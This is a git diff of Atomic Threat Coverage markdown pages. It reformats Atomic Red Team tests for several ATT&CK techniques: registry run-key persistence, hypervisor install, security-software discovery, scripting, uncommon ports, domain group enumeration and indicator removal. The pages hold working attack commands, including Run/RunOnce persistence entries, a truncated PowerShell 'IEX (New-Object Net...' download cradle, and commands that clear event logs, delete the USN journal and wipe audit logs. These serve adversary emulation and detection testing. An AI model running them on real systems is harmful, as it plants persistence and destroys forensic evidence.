Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level. The following run keys are created by default on Windows systems: + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce -The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) +The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not +created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as +a dependency. 
(Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a " +Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d " +C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) The following Registry keys can be used to set startup folder items for persistence: + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders The following Registry keys can control automatic startup of services during boot: + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run -The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs. +The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. 
Most of these actions +are under the control of the operating system, but you can also add custom actions here. The +HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and +HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch +programs. -Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on. +Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows +NT\CurrentVersion\Windows run when any user logs on. -By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot. +By default, the multistring BootExecute value of the registry key +HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value +causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down +abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at +boot. - -Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.
+Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain +persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) +to make the Registry entries look as if they are associated with legitimate programs. ## Atomic Tests @@ -43,97 +63,83 @@ Adversaries can use these configuration locations to execute malware, such as re - [Atomic Test #3 - PowerShell Registry RunOnce](#atomic-test-3---powershell-registry-runonce) -
## Atomic Test #1 - Reg Key Run + Run Key Persistence -Upon successful execution, cmd.exe will modify the registry by adding "Atomic Red Team" to the Run key. Output will be via stdout. +Upon successful execution, cmd.exe will modify the registry by adding "Atomic Red Team" to the Run key. Output will be +via stdout. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" ``` #### Cleanup Commands: + ```cmd REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 ``` - - - -

## Atomic Test #2 - Reg Key RunOnce + RunOnce Key Persistence. -Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. +Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via +stdout. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.dll| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" ``` #### Cleanup Commands: + ```cmd REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 ``` - - - -

## Atomic Test #3 - PowerShell Registry RunOnce + RunOnce Key Persistence via PowerShell Upon successful execution, a new entry will be added to the runonce item in the registry. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | thing_to_execute | Thing to Run | Path | powershell.exe| | reg_key_path | Path to registry key to update | Path | HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell $RunOnceKey = "#{reg_key_path}" @@ -141,12 +147,9 @@ set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net ``` #### Cleanup Commands: + ```powershell Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1062.md b/Atomic_Threat_Coverage/Triggers/T1062.md
index 009d60be..3eaf905c 100644
--- a/Atomic_Threat_Coverage/Triggers/T1062.md
+++ b/Atomic_Threat_Coverage/Triggers/T1062.md
@@ -1,36 +1,35 @@
 # T1062 - Hypervisor
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1062)
+
A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.
## Atomic Tests - [Atomic Test #1 - Installing Hyper-V Feature](#atomic-test-1---installing-hyper-v-feature) -
## Atomic Test #1 - Installing Hyper-V Feature + PowerShell command to check if Hyper-v is installed. Install Hyper-V feature. Create a New-VM -Upon successful execution, powershell will check if Hyper-V is installed, if not, install it and create a base vm. Output will be via stdout. +Upon successful execution, powershell will check if Hyper-V is installed, if not, install it and create a base vm. +Output will be via stdout. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | hostname | Host to query to see if Hyper-V feature is installed. | string | test-vm| | vm_name | Create a new VM. | string | testvm| | file_location | Location of new VHDX file | string | C:\Temp\test.vhdx| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Get-WindowsFeature -Name Hyper-V -ComputerName #{hostname} @@ -38,9 +37,4 @@ Install-WindowsFeature -Name Hyper-V -ComputerName #{hostname} -IncludeManagemen New-VM -Name #{vm_name} -MemoryStartupBytes 1GB -NewVHDPath #{file_location} -NewVHDSizeBytes 21474836480 ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1063.md b/Atomic_Threat_Coverage/Triggers/T1063.md
index 852b8c3a..0ffde956 100644
--- a/Atomic_Threat_Coverage/Triggers/T1063.md
+++ b/Atomic_Threat_Coverage/Triggers/T1063.md
@@ -1,11 +1,17 @@
 # T1063 - Security Software Discovery
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1063)
-
Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1063) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. +
Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1063) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. ### Windows -Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. +Example commands that can be used to obtain security software information +are [netsh](https://attack.mitre.org/software/S0108), reg query +with [Reg](https://attack.mitre.org/software/S0075), dir +with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other +indicators of discovery behavior may be more specific to the type of software or security system the adversary is +looking for. ### Mac @@ -23,10 +29,10 @@ It's becoming more common to see macOS malware perform checks for LittleSnitch a - [Atomic Test #5 - Security Software Discovery - AV Discovery via WMI](#atomic-test-5---security-software-discovery---av-discovery-via-wmi) -
## Atomic Test #1 - Security Software Discovery + Methods to identify Security Software on an endpoint when sucessfully executed, the test is going to display running processes, firewall configuration on network profiles @@ -34,12 +40,7 @@ and specific security software. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd netsh.exe advfirewall show allprofiles @@ -50,27 +51,18 @@ tasklist.exe | findstr /i defender tasklist.exe | findstr /i cylance ``` - - - - -

## Atomic Test #2 - Security Software Discovery - powershell + Methods to identify Security Software on an endpoint when sucessfully executed, powershell is going to processes related AV products if they are running. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell get-process | ?{$_.Description -like "*virus*"} @@ -79,87 +71,55 @@ get-process | ?{$_.Description -like "*defender*"} get-process | ?{$_.Description -like "*cylance*"} ``` - - - - -

## Atomic Test #3 - Security Software Discovery - ps + Methods to identify Security Software on an endpoint -when sucessfully executed, command shell is going to display AV software it is running( Little snitch or carbon black ). +when sucessfully executed, command shell is going to display AV software it is running( Little snitch or carbon black ). **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh ps -ef | grep Little\ Snitch | grep -v grep ps aux | grep CbOsxSensorService ``` - - - - -

## Atomic Test #4 - Security Software Discovery - Sysmon Service + Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed). when sucessfully executed, the test is going to display sysmon driver instance if it is installed. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd fltmc.exe | findstr.exe 385201 ``` - - - - -

## Atomic Test #5 - Security Software Discovery - AV Discovery via WMI + Discovery of installed antivirus products via a WMI query. when sucessfully executed, the test is going to display installed AV software. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd wmic.exe /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1064.md b/Atomic_Threat_Coverage/Triggers/T1064.md
index 06dacd61..d7357d18 100644
--- a/Atomic_Threat_Coverage/Triggers/T1064.md
+++ b/Atomic_Threat_Coverage/Triggers/T1064.md
@@ -1,10 +1,19 @@
 # T1064 - Scripting
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1064)
+
Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts. -Scripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them. +Scripts can be embedded inside Office documents as macros that can be set to execute when files used +in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. +Malicious embedded macros are an alternative means of execution than software exploitation +through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on +macros being allowed or that the user will accept to activate them. -Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. 
Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)
+Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. +Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three +examples that are popular among penetration testers for exploit and post-compromise operations and include many features +for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)
## Atomic Tests @@ -12,20 +21,15 @@ Many popular offensive frameworks exist which use forms of scripting for securit - [Atomic Test #2 - Create and Execute Batch Script](#atomic-test-2---create-and-execute-batch-script) -
## Atomic Test #1 - Create and Execute Bash Shell Script + Creates and executes a simple bash script. **Supported Platforms:** macOS, Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh" @@ -34,56 +38,50 @@ chmod +x /tmp/art.sh sh /tmp/art.sh ``` - - - - -

## Atomic Test #2 - Create and Execute Batch Script -Creates and executes a simple batch script. Upon execution, CMD will briefly launh to run the batch script then close again. - -**Supported Platforms:** Windows - +Creates and executes a simple batch script. Upon execution, CMD will briefly launh to run the batch script then close +again. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_execute | Command to execute within script. | string | dir| | script_path | Path of script to create. | path | $env:TEMP\T1064_script.bat| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Start-Process #{script_path} ``` #### Cleanup Commands: + ```powershell Remove-Item #{script_path} -Force -ErrorAction Ignore ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Batch file must exist on disk at specified location (#{script_path}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{script_path}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item #{script_path} -Force | Out-Null Set-Content -Path #{script_path} -Value "#{command_to_execute}" ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1065.md b/Atomic_Threat_Coverage/Triggers/T1065.md
index fe1a98f9..2ff169a0 100644
--- a/Atomic_Threat_Coverage/Triggers/T1065.md
+++ b/Atomic_Threat_Coverage/Triggers/T1065.md
@@ -1,5 +1,7 @@
 # T1065 - Uncommonly Used Port
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1065)
+
Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.
## Atomic Tests @@ -8,65 +10,49 @@ - [Atomic Test #2 - Testing usage of uncommonly used port](#atomic-test-2---testing-usage-of-uncommonly-used-port) -
## Atomic Test #1 - Testing usage of uncommonly used port with PowerShell -Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon exectuion, details about the successful + +Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon +exectuion, details about the successful port check will be displayed. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | port | Specify uncommon port number | String | 8081| | domain | Specify target hostname | String | google.com| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Test-NetConnection -ComputerName #{domain} -port #{port} ``` - - - - -

## Atomic Test #2 - Testing usage of uncommonly used port + Testing uncommonly used port utilizing telnet. **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | port | Specify uncommon port number | String | 8081| | domain | Specify target hostname | String | google.com| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh telnet #{domain} #{port} ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1069.md b/Atomic_Threat_Coverage/Triggers/T1069.md
index 5761eab7..b28e9f89 100644
--- a/Atomic_Threat_Coverage/Triggers/T1069.md
+++ b/Atomic_Threat_Coverage/Triggers/T1069.md
@@ -1,24 +1,33 @@
 # T1069 - Permission Groups Discovery
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1069)
+
Adversaries may attempt to find local system or domain-level groups and permissions settings. ### Windows -Examples of commands that can list groups are net group /domain and net localgroup using the [Net](https://attack.mitre.org/software/S0039) utility. +Examples of commands that can list groups are net group /domain and net localgroup using +the [Net](https://attack.mitre.org/software/S0039) utility. ### Mac -On Mac, this same thing can be accomplished with the dscacheutil -q group for the domain, or dscl . -list /Groups for local groups. +On Mac, this same thing can be accomplished with the dscacheutil -q group for the domain, or dscl . +-list /Groups for local groups. ### Linux -On Linux, local groups can be enumerated with the groups command and domain groups via the ldapsearch command. +On Linux, local groups can be enumerated with the groups command and domain groups via the +ldapsearch command. ### Office 365 and Azure AD -With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts.(Citation: Microsoft msrole)(Citation: GitHub Raindance) +With authenticated access there are several tools that can be used to find permissions groups. The +Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 +accounts.(Citation: Microsoft msrole)(Citation: GitHub Raindance) -Azure CLI (AZ CLI) also provides an interface to obtain permissions groups with authenticated access to a domain. The command az ad user get-member-groups will list groups associated to a user account.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)
+Azure CLI (AZ CLI) also provides an interface to obtain permissions groups with authenticated access to a domain. The +command az ad user get-member-groups will list groups associated to a user account.(Citation: Microsoft AZ +CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)
## Atomic Tests @@ -30,20 +39,15 @@ Azure CLI (AZ CLI) also provides an interface to obtain permissions groups with - [Atomic Test #4 - Elevated group enumeration using net group](#atomic-test-4---elevated-group-enumeration-using-net-group) -
## Atomic Test #1 - Permission Groups Discovery + Permission Groups Discovery **Supported Platforms:** macOS, Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh dscacheutil -q group @@ -51,26 +55,18 @@ dscl . -list /Groups groups ``` - - - - -

## Atomic Test #2 - Basic Permission Groups Discovery Windows -Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain + +Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to +a domain. Upon execution, domain information will be displayed. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd net localgroup @@ -78,57 +74,43 @@ net group /domain net group "domain admins" /domain ``` - - - - -

## Atomic Test #3 - Permission Groups Discovery PowerShell -Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain + +Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected +to a domain. Upon execution, domain information will be displayed. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | user | User to identify what groups a user is a member of | string | administrator| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell get-localgroup get-ADPrincipalGroupMembership #{user} | select name ``` - - - - -

## Atomic Test #4 - Elevated group enumeration using net group -Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This -test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. - -**Supported Platforms:** Windows - - - +Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value +domain groups. This +test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be +displayed. -#### Attack Commands: Run with `command_prompt`! +**Supported Platforms:** Windows +#### Attack Commands: Run with `command_prompt`! ```cmd net group /domai "Domain Admins" @@ -137,9 +119,4 @@ net groups "Exchange Organization Management" /doma net group "BUILTIN\Backup Operators" /doma ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1070.md b/Atomic_Threat_Coverage/Triggers/T1070.md
index e436fef2..a671ca07 100644
--- a/Atomic_Threat_Coverage/Triggers/T1070.md
+++ b/Atomic_Threat_Coverage/Triggers/T1070.md
@@ -1,14 +1,21 @@
 # T1070 - Indicator Removal on Host
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070)
+
Adversaries may delete or alter generated artifacts on a host system, including logs and potentially captured files such as quarantined malware. Locations and format of logs will vary, but typical organic system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/* . -Actions that interfere with eventing and other notifications that can be used to detect intrusion activity may compromise the integrity of security solutions, causing events to go unreported. They may also make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred. +Actions that interfere with eventing and other notifications that can be used to detect intrusion activity may +compromise the integrity of security solutions, causing events to go unreported. They may also make forensic analysis +and incident response more difficult due to lack of sufficient data to determine what occurred. ### Clear Windows Event Logs -Windows event logs are a record of a computer's alerts and notifications. Microsoft defines an event as "any significant occurrence in the system or in a program that requires users to be notified or an entry added to a log." There are three system-defined sources of Events: System, Application, and Security. - -Adversaries performing actions related to account management, account logon and directory service access, etc. may choose to clear the events in order to hide their activities. +Windows event logs are a record of a computer's alerts and notifications. Microsoft defines an event as "any significant +occurrence in the system or in a program that requires users to be notified or an entry added to a log." There are three +system-defined sources of Events: System, Application, and Security. + +Adversaries performing actions related to account management, account logon and directory service access, etc. 
may +choose to clear the events in order to hide their activities. The event logs can be cleared with the following utility commands: @@ -16,7 +23,8 @@ The event logs can be cleared with the following utility commands: * wevtutil cl application * wevtutil cl security -Logs may also be cleared through other mechanisms, such as [PowerShell](https://attack.mitre.org/techniques/T1086).
+Logs may also be cleared through other mechanisms, such as [PowerShell](https://attack.mitre.org/techniques/T1086) +. ## Atomic Tests @@ -34,163 +42,124 @@ Logs may also be cleared through other mechanisms, such as [PowerShell](https:// - [Atomic Test #7 - Delete System Logs Using Clear-EventLogId](#atomic-test-7---delete-system-logs-using-clear-eventlogid) -
## Atomic Test #1 - Clear Logs -Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. - -**Supported Platforms:** Windows - +Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and +verify that it is now empty. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | log_name | Windows Log Name, ex System | String | System| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd wevtutil cl #{log_name} ``` - - - - -

## Atomic Test #2 - FSUtil -Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon exectuion, no output -will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn - -**Supported Platforms:** Windows - - - +Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on +the volume. Upon exectuion, no output +will be displayed. More information about fsutil can be found +at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) +**Supported Platforms:** Windows +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd fsutil usn deletejournal /D C: ``` #### Cleanup Commands: + ```cmd fsutil usn createjournal m=1000 a=100 c: ``` - - - -

## Atomic Test #3 - rm -rf + Delete system and audit logs **Supported Platforms:** macOS, Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh rm -rf /private/var/log/system.log* rm -rf /private/var/audit/* ``` - - - - -

## Atomic Test #4 - Overwrite Linux Mail Spool -This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers. - -**Supported Platforms:** Linux - +This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the +exploitation of Linux web servers. +**Supported Platforms:** Linux #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of mail spool | String | root| - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash echo 0> /var/spool/mail/#{username} ``` - - - - -

## Atomic Test #5 - Overwrite Linux Log -This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. - -**Supported Platforms:** Linux - +This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux +web servers. +**Supported Platforms:** Linux #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | log_path | Path of specified log | Path | /var/log/secure| - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash echo 0> #{log_path} ``` - - - - -

## Atomic Test #6 - Delete System Logs Using PowerShell + Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments. -Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it. +Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has +very few logs in it. When this service get's stopped, it is automatically restarted and the Security.evtx folder re-created. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell $eventLogId = Get-WmiObject -Class Win32_Service -Filter "Name LIKE 'EventLog'" | Select-Object -ExpandProperty ProcessId @@ -199,37 +168,26 @@ Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx ``` #### Cleanup Commands: + ```powershell Start-Service -Name EventLog ``` - - - -

## Atomic Test #7 - Delete System Logs Using Clear-EventLogId + Clear event logs using built-in PowerShell commands. -Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it. +Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has +very few logs in it. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Clear-EventLog -logname Application ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1071.md b/Atomic_Threat_Coverage/Triggers/T1071.md
index d11484d6..bc3e9de9 100644
--- a/Atomic_Threat_Coverage/Triggers/T1071.md
+++ b/Atomic_Threat_Coverage/Triggers/T1071.md
@@ -1,8 +1,11 @@
 # T1071 - Standard Application Layer Protocol
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1071)
+
Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. -For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.
